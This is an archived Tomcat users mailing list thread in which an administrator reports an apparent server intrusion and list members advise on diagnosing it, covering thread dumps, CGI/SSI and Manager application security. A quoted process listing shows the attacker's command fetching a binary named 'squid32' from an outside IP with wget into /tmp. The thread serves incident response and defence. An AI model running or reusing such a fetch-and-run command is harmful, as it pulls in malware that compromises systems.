tomcat-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Martin Gainty <mgai...@hotmail.com>
Subject RE: Regarding i think an intrusion
Date Wed, 30 Apr 2014 16:18:06 GMT

> Date: Wed, 30 Apr 2014 12:35:52 -0300
> Subject: Re: Regarding i think an intrusion
> From: lsantagostini@gmail.com
> To: users@tomcat.apache.org
> 
> Hello list,
> 
> well my homework is done
> 
> Here are the links:
> 
> setenv.sh: http://pastebin.com/EN1mXDFi
> catalina.sh: http://pastebin.com/1vRVLbSm
> web.xml: http://pastebin.com/BqEfiXXm
> server.xml: http://pastebin.com/wfzE8bYU
> logging.properties: http://pastebin.com/Qurk8sLU
> catalina.properties: http://pastebin.com/jkfY1ZRQ
> tree + logsfiles: http://pastebin.com/j3tip4ij

MG>Por favor, pegue el contenido de los siguientes archivos de registros en Pastebin y
enviarnos link:

-rw-rw-r-- 1 tomcat tomcat  5.0K Apr 30 05:38 localhost.2014-04-30.log-rw-rw-r-- 1 tomcat
tomcat  5.4M Apr 30 12:19 localhost_access_log.2014-04-30.txt
-rw-rw-r-- 1 tomcat tomcat     0 Apr 30 05:38 manager.2014-04-30.log
-rw-rw-r-- 1 tomcat tomcat  3.7M Apr 30 12:19 PDI_access_log.2014-04-30.txt-rw-rw-r-- 1 tomcat
tomcat   43M Apr 30 12:18 portal-ht.log-rw-rw-r-- 1 tomcat tomcat  583K Apr 30 10:09 portal-mh.log-rw-rw-r--
1 tomcat tomcat   58M Apr 30 12:19 portal-pdi.log-rw-rw-r-- 1 tomcat tomcat  3.5M Apr 30 12:18
portal-rt.log
-rw-rw-r-- 1 tomcat tomcat  3.6M Apr 30 12:18 probe.log
-rw-rw-r-- 1 tomcat tomcat  591K Apr 30 12:18 RT_access_log.2014-04-30.txt

MG>Saludos Cordiales desde EEUU

> 
> Note that logsfiles, are not the logfiles itsef but only a ls -lah (just
> for you to see the logsizes)
> 
> A little more about the infraestructure i've mounted ill do some ascii art.
> 
> 
> internet ---> FW -->nat-->Haproxy (1)-->Apache(2)--> mod_jk
> (3)-->Haproxy(4)--> Tomcat7(5) --> haproxy(6) --Tomcat(7)
> 
> 
> Apache(2) is serving static content so haproxy(1) at the first level does
> http round robin balancing
> Apache(2) connects to tomcat(5) through haproxy(4) (using L4 connection)
> using mod_jk(3)
> Tomcat(5) are the main app server (the ones gets intruded) who uses
> tomcat(7) (solr service) using haproxy(6) using L4 connection.
> 
> Versions:
> 
> Apache: 2.2.17
> mod_jk: 1.2.31
> haproxy: 1.4.22
> Tomcat: 7.0.53
> Java: 1.6.0.41
> 
> [root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version
> java version "1.6.0_41"
> Java(TM) SE Runtime Environment (build 1.6.0_41-b02)
> Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode)
> 
> OS: CentOS 5.8 64 bit
> 
> [root@arcbaappvrt05 tomcat]# uname -a
> Linux arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb 21
> 20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux
> [root@arcbaappvrt05 tomcat]# cat /etc/redhat-release
> CentOS release 5.8 (Final)
> [root@arcbaappvrt05 tomcat]#
> 
> For now i havent see that the squid process whas launched so i couldnt do a
> dump
> 
> Letme know if you need more information.
> 
> BTW, pastebin links will work for one week.
> 
> Kind regards, yours
> 
> 
> 
> 
> Saludos.-
> Leonardo Santagostini
> 
> <http://ar.linkedin.com/in/santagostini>
> 
> 
> 
> 
> 
> 2014-04-30 11:09 GMT-03:00 Leonardo Santagostini <lsantagostini@gmail.com>:
> 
> > Ok, i will do the following:
> >
> > 1) thread dump of running tomcat instance
> > 2) Pastebin the running tomcat config
> >
> > I think at mid day will have all the info.
> >
> > Thanks all for replying me and all the responses.
> >
> > Regards, Leonardo
> >
> > Saludos.-
> > Leonardo Santagostini
> >
> > <http://ar.linkedin.com/in/santagostini>
> >
> >
> >
> >
> >
> > 2014-04-30 10:55 GMT-03:00 Christopher Schultz <
> > chris@christopherschultz.net>:
> >
> > -----BEGIN PGP SIGNED MESSAGE-----
> >> Hash: SHA256
> >>
> >> Konstantin,
> >>
> >> On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
> >> > 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini
> >> > <lsantagostini@gmail.com>:
> >> >> Hello Dan,
> >> >>
> >> >> Nop, the attacker is executing locally the following
> >> >>
> >> >> tomcat    8882     1  0 Apr27 ?        00:00:00 sh /tmp/4.sh
> >> >> tomcat    8893  8882  0 Apr27 ?        00:00:00 wget
> >> >> http://218.199.102.59/.xy/squid32 -O /tmp/squid
> >> >>
> >> >> And the launch squid who tries to connect via ssh to varoius
> >> >> places.
> >> >>
> >> >> Right now its time to leave the office, but in a few hours i will
> >> >> paste in pastebin access logs, config files, wherever you tell
> >> >> me.
> >> >>
> >> >> This is my pstree
> >> >>
> >> >> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd
> >> >> ├─java─┬─sh───wget │      └─263*[{java}]
> >> >
> >> > sh launched by tomcat's java?
> >>
> >> Yes: please verify that it's the JVM running Tomcat, and not just any
> >> JVM process.
> >>
> >> > Take a thread dump:
> >> >
> >> https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
> >> >
> >> >  It shall show what is stacktrace in thread that launched external
> >> > process.
> >>
> >> +1
> >>
> >> The only things that ship with Tomcat that call Process.exec() are the
> >> CGI servlet and SSI, both of which are disabled by default. So, either
> >> you have an insecure CGI/SSI configuration, your web application has a
> >> vulnerability, or you have deployed something like the Manager
> >> application and improperly-secured it.
> >>
> >> A classic example of such an intrusion might be that someone got a
> >> foothold elsewhere into your network, and the Manager web application
> >> is not properly secured with a password, etc.
> >>
> >> - -chris
> >> -----BEGIN PGP SIGNATURE-----
> >> Version: GnuPG v1
> >> Comment: GPGTools - http://gpgtools.org
> >> Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
> >>
> >> iQIcBAEBCAAGBQJTYQDeAAoJEBzwKT+lPKRYaPoQAKpqrj5bWfGXpEEHMINjw1Qp
> >> +qqdL7O61QLmWoA1neUbyM7A2s8mY3lRdcZwDw2IG33xoeLuFaavhFlDGr2Txer4
> >> HiGDR8ixOv2mY9J9bMC889hih4N5dz0fYlw/b5SouUVz2aCbeUhYK+6lsBXRy2fC
> >> D+UoNOiQF6uX2ZlqJYZTAvgzC2t/SGGnTW3GLx+3buRxs4JlUjJ8RWEOZtjZLQ5o
> >> gUZ+UF6K/7dewYr6TjDmwc1C226dJNaliymQu2qbVgpRvoJ+baRgpeoyt6hzhIxr
> >> BA8gjKY5xOH6QrpSX2tdU8RNCRVLIgSmbp9Mj+Hovdw4kkDMLQvS3osuGq5HaEwS
> >> ZMltWiTef+K2yZyO3L8xrsJaRbox1j8Pg38ea22GRE48kpNagoQdCM2+uMCVN8Yj
> >> UFjUrcpMu0FX06dy8azbFDRZMv5lD8nmwgE624nT+gZfFaxGHNLa9dRpJWHZgvTb
> >> TSESKHv2lq9F4qc7bxoVrRDa8hnNLHk2luU9qot5JWXnb5en0fFKMZopwXwXYA4W
> >> WgGA0Cfy4gALkA4/CCqrsn6Z+EqIxXNdCn74CeeCh5fV28+0Zpuj7G1adtJUkCQ7
> >> 87Cq6kXwHx4hfp//6vQhnZIGWYeKDOIgqbKuaP27pIcE1QCag5MOlmVT4pQjpT12
> >> lvJcfOhzHLwo07Pv+y3J
> >> =EiX9
> >> -----END PGP SIGNATURE-----
> >>
> >> ---------------------------------------------------------------------
> >> To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
> >> For additional commands, e-mail: users-help@tomcat.apache.org
> >>
> >>
> >
 		 	   		  
Mime
  • Unnamed multipart/alternative (inline, None, 0 bytes)
View raw message